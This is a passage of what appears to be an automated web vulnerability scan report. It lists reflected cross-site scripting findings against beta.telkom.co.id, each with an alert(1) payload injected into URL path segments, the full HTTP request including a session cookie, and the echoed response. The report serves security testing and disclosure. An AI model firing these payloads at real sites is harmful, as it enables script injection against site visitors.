<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/index.html</b>
...[SNIP]...

4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d55"><script>alert(1)</script>d4049881182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:52 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/index.html?&lid=en">
...[SNIP]...

4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c5cc1--><script>alert(1)</script>87ec397da79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:34:00 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23755
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/index.html?&lid=en">
...[SNIP]...

4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e31b<script>alert(1)</script>d300cf6ec0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:55 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/index.html</b>
...[SNIP]...

4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ebcf5--><script>alert(1)</script>ef3a5ae96a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:15 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/index.html?&lid=en">
...[SNIP]...

4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19106"><script>alert(1)</script>a76d99c8f5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/index.html?&lid=en">
...[SNIP]...

4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4087<script>alert(1)</script>aa40da893a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:10 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23345
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/index.html</b>
...[SNIP]...

4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60f9c<script>alert(1)</script>8ae36b26f5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:23 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/index.html</b>
...[SNIP]...

4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d37"><script>alert(1)</script>bbb5636eea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:20 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/index.html?&lid=en">
...[SNIP]...

4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 1f818--><script>alert(1)</script>468d84d6482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/index.html?&lid=en">
...[SNIP]...

4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce78"><script>alert(1)</script>7e6a736b2fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/index.html?&lid=en">
...[SNIP]...

4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cba5e--><script>alert(1)</script>94534c2b59f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/index.html?&lid=en">
...[SNIP]...

4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9913e<script>alert(1)</script>9c313f8dfec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:41 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/index.html</b>
...[SNIP]...

4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ef"><script>alert(1)</script>5b76f035ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
